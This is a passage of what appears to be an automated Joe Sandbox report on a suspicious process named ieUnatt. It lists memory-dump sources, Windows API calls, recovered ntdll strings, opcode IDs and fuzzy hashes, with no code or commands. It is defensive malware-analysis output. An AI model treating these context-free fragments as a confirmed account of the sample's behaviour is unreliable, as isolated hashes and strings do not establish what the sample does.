                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D823B0,02D9860F,02D95CCF,02D82380), ref: 02D887F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02D8149D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: eb90c397723a5990a06be84d0c4b6b51d812d19446f2aeb0b0c80889db93d366
                                                                                                              • Instruction ID: 7a7cf41abdc7f022024fbd4358f081dd6776bb910dc44f16200fe53cce994b7a
                                                                                                              • Opcode Fuzzy Hash: eb90c397723a5990a06be84d0c4b6b51d812d19446f2aeb0b0c80889db93d366
                                                                                                              • Instruction Fuzzy Hash: 7EB09B75D015D5C5FB51F7604709B1779107BD0705F15D0A5E3530641E4739D1D2F175
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                                              • Instruction ID: 508044f285095114df757269c4cf55dc7714c59f7627033253fe831cdd12ca63
                                                                                                              • Opcode Fuzzy Hash: d386bb627630dbe32cc7d41eefeeae4b7758c1892456d2af03914b291bdce285
                                                                                                              • Instruction Fuzzy Hash: 5941E97561CB0D8FD369EF689085776B3E2FB89300F51462DD98AC3252EB70D8468785
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3754132690
                                                                                                              • Opcode ID: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                                              • Instruction ID: b42a3ecfa0f3c6c4297e61275817d67e42aac0d41f4c7d74bb55f281ee8d4fde
                                                                                                              • Opcode Fuzzy Hash: d0d2da888bc9bfe4dd4fd066b230f549b696502cb478700a218cebe9bdc33d47
                                                                                                              • Instruction Fuzzy Hash: 28914EF04082948AC7158F58A0652AFFFB5EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4015407659.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_51a0000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                                              • API String ID: 0-3311200144
                                                                                                              • Opcode ID: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                                              • Instruction ID: 5f8404fa36e3b89502cfcf697e9066bd6e864a2e02c455ed04ac11995a7c1b8a
                                                                                                              • Opcode Fuzzy Hash: 0217cd2b48621ced41b2a264c866e23ac6367ed3c145a72057eedb05b82bda78
                                                                                                              • Instruction Fuzzy Hash: 483162B084474DDBCF25DF84DA827DDBB71FB01354F80A248E8096F254CBB68A54CB8A
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 8e3251e681ef3d03bfe75de854ca1609a3777d5c88d1b65149996dc70624bee9
                                                                                                              • Instruction ID: 1db2c6f6cbf2f485cbb9eb7dcaff458d9a87b7aff10c8ae29911492d7aa3a69f
                                                                                                              • Opcode Fuzzy Hash: 8e3251e681ef3d03bfe75de854ca1609a3777d5c88d1b65149996dc70624bee9
                                                                                                              • Instruction Fuzzy Hash: 5951FBB6F00116BFDB10DF988D8057EF7B8BB08208B14916DE559D7645E234FE01DBA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: aba55577402fc4486f4001f3fa577fd7f8b146ddffd55add5aaff690820014e7
                                                                                                              • Instruction ID: 6227b931932035a8946053750dbe486e074539b0a676736c4c384d79c7a94ac2
                                                                                                              • Opcode Fuzzy Hash: aba55577402fc4486f4001f3fa577fd7f8b146ddffd55add5aaff690820014e7
                                                                                                              • Instruction Fuzzy Hash: 1A510471E00645AFDB70DF9CC89097FB7F9EF44206B058499E896D7681E674FA01CB60
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EF4655
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EF4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EF4742
                                                                                                              • Execute=1, xrefs: 04EF4713
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04EF4787
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EF46FC
                                                                                                              • ExecuteOptions, xrefs: 04EF46A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 124b115bbd16e901bfcb8689c3151f2ad254a77b8e7c6fe905ab7087aa2e0291
                                                                                                              • Instruction ID: 3eeec9e703bc4c761da4960030de015b4e444eb1695f0100ce20de4c2f22737c
                                                                                                              • Opcode Fuzzy Hash: 124b115bbd16e901bfcb8689c3151f2ad254a77b8e7c6fe905ab7087aa2e0291
                                                                                                              • Instruction Fuzzy Hash: 5E5108316402196AEF25ABA4DC85FEF77A8EF84308F0414A9D945AB5D0E770BE419F90
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 9d962f88781eae06534e7b7ec7e1aa4c603f8e135bf40cac726e3ddf1d6cd152
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 9D81E470E452498EDF24CF68EA527FEBBB2AF45314F18661DE861A72D0C734B842CB50
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EF02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EF02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 40b868d8978b5fe0e1a475d37f70307278ff708a79f24e186b17571803b73b78
                                                                                                              • Instruction ID: fcdd347bc3e1b887d9218df184002f2df42bb9c620d000e0b3059fb0d412b426
                                                                                                              • Opcode Fuzzy Hash: 40b868d8978b5fe0e1a475d37f70307278ff708a79f24e186b17571803b73b78
                                                                                                              • Instruction Fuzzy Hash: A0E1C0306087419FE725CF28C884B6AB7E0BF88318F145A5DF5A58B2E1E774F855CB92
                                                                                                              Strings
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EF7B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF7BAC
                                                                                                              • RTL: Resource at %p, xrefs: 04EF7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: e26f8bd7359c269799fa746f7ca8f32befac8c024258fe2c320bacb80792b6da
                                                                                                              • Instruction ID: 502af441385775b0a44edf129b13f802b59d582cdec26058f823803901c9bc5f
                                                                                                              • Opcode Fuzzy Hash: e26f8bd7359c269799fa746f7ca8f32befac8c024258fe2c320bacb80792b6da
                                                                                                              • Instruction Fuzzy Hash: BB41E4317057029FD724DE25CC40BABB7E6EF89714F001A1DE996DB680DB71F4058B91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EF728C
                                                                                                              Strings
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EF7294
                                                                                                              • RTL: Re-Waiting, xrefs: 04EF72C1
                                                                                                              • RTL: Resource at %p, xrefs: 04EF72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 1a0874b07a71603de6b75a46e622759d7cbb7c6ac4118a4c7860e2f986e86464
                                                                                                              • Instruction ID: ce6864078a5e0c472ce3de7edb2f9b14d6cda09cf0a683d33609a96b218fc90e
                                                                                                              • Opcode Fuzzy Hash: 1a0874b07a71603de6b75a46e622759d7cbb7c6ac4118a4c7860e2f986e86464
                                                                                                              • Instruction Fuzzy Hash: A341F471700202AFE724DE65CC41FAAB7A5FB84718F105619FE95EB680EB31F8528BD1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 5a188ebde15ff118c73f0bdd969e680365955b159ece78825b9cfda87ae52118
                                                                                                              • Instruction ID: 281cecec5cbe0344a930a93a1108287d7f192cc85074ebe54e724a29856910c1
                                                                                                              • Opcode Fuzzy Hash: 5a188ebde15ff118c73f0bdd969e680365955b159ece78825b9cfda87ae52118
                                                                                                              • Instruction Fuzzy Hash: 9E319872A002199FDB20DF29DC40BEE77F8EF44715F450595E849E3240EB30BA459FA1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 209f928bf85bbd044eb75a40c9b516066e02b48df7f0b3a6370ba3e73bcfeb9b
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: E1919271E0025BDEEB24DF69CA816BEB7A5BF44724F14651EE855E72C0E730A942CF20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 1621ffc95cd91c604a8a4568f954fc04d2974dc54d0cc51f8c6fac9820561a39
                                                                                                              • Instruction ID: 7edbf73059de95ddc19835535b7dd65baa4c7bb21e38f043a20ee0f1625da39e
                                                                                                              • Opcode Fuzzy Hash: 1621ffc95cd91c604a8a4568f954fc04d2974dc54d0cc51f8c6fac9820561a39
                                                                                                              • Instruction Fuzzy Hash: 97811CB1D002699BDB359F54CD44BEEB6B8AB08714F0055EAAA1DB7240E7706E848FA0
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 04F0CFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                              • Opcode ID: 8d80f9d66d64b7fb1912daafd3f8f4510d97bd4071ca09a118c80cf32e6910c5
                                                                                                              • Instruction ID: d28affd66a211d89a0c12b8aae900c13fd77dd1a2a68ba6a72e17b4a876b2e27
                                                                                                              • Opcode Fuzzy Hash: 8d80f9d66d64b7fb1912daafd3f8f4510d97bd4071ca09a118c80cf32e6910c5
                                                                                                              • Instruction Fuzzy Hash: 79418271D00258EFEF219F95D940A6EBBB8FF84714F00856AE915DB298D734E802EB61